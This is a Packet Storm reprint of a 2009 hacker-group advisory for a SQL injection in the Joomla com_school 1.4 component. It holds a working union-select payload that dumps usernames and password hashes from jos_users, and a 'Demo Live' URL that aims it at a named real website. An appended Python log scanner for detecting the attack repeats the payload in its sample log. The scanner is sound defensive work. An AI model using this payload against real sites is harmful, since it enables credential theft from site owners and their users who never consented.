Joomla School Component 1.4 SQL Injection

2009-06-08T00:00:00
ID PACKETSTORM:78139
Type packetstorm
Reporter Chip D3 Bi0s
Modified 2009-06-08T00:00:00

Description

                                        
`----------------------------------------------------------------------  
Joomla Component com_school (classid) SQL injection Vulnerability  
----------------------------------------------------------------------  
  
###################################################  
[+] Author : Chip D3 Bi0s  
[+] Email : chipdebios[alt+64]gmail.com  
[+] Group : LatinHackTeam  
[+] Vulnerability : SQL injection  
###################################################  
  
________________________________________________________  
  
Example:  
  
http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>  
  
<Sql Code>:  
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*  
  
  
Demo Live:  
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*  
  
  
+++++++++++++++++++++++++++++++++  
[!] Produced in South America  
------------------------------------  
  
  
<name>school</name>  
<creationDate>18 July 2006</creationDate>  
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>  
<copyright>  
This component in released under the GNU/GPL License  
</copyright>  
<authorEmail>damj3t@gmail.com</authorEmail>  
<authorUrl>www.joomla.cl</authorUrl>  
<version>1.4</version>  
  
  
`
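
Added example, not part of the original advisory: a log check that flags com_school requests whose classid parameter is not a plain integer, which is the condition the injection shown above depends on. The access-log format (Apache combined), the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters/keywords that never belong in a numeric class id (checked after URL-decoding).
SQL_TOKENS = re.compile(r"'|\"|/\*|--|#|\b(?:union|select|concat|from)\b", re.I)
# Request line inside an Apache combined-format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return 'ok', 'non_numeric' or 'sqli_pattern' for a com_school request, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_school":
        return None
    verdict = "ok"
    for value in query.get("classid", []):   # every occurrence, in case it is repeated
        if SQL_TOKENS.search(value):
            return "sqli_pattern"
        if not re.fullmatch(r"[0-9]+", value):
            verdict = "non_numeric"          # e.g. double-encoded quotes, 'null', blanks
    return verdict

def scan(lines):
    """Return (line_number, verdict, url) for each com_school request that is not 'ok'."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        verdict = classify(match.group(1))
        if verdict not in (None, "ok"):
            hits.append((number, verdict, match.group(1)))
    return hits

# Constructed sample entries (documentation IP ranges, placeholder /path/ from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jun/2009:10:00:01 +0000] "GET /path/index.php?option=com_school&Itemid=3&func=showclass&classid=12 HTTP/1.1" 200 5120
198.51.100.7 - - [08/Jun/2009:10:00:05 +0000] "GET /path/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/* HTTP/1.1" 200 734
198.51.100.7 - - [08/Jun/2009:10:00:09 +0000] "GET /path/index.php?option=com_school&func=showclass&classid=1%2527 HTTP/1.1" 200 5120
192.0.2.10 - - [08/Jun/2009:10:00:12 +0000] "GET /path/index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000
""".splitlines()

if __name__ == "__main__":
    for number, verdict, url in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {url}")
```

The same integer-only rule applied to classid on the server side, before the value reaches any query, is what removes the condition this check looks for.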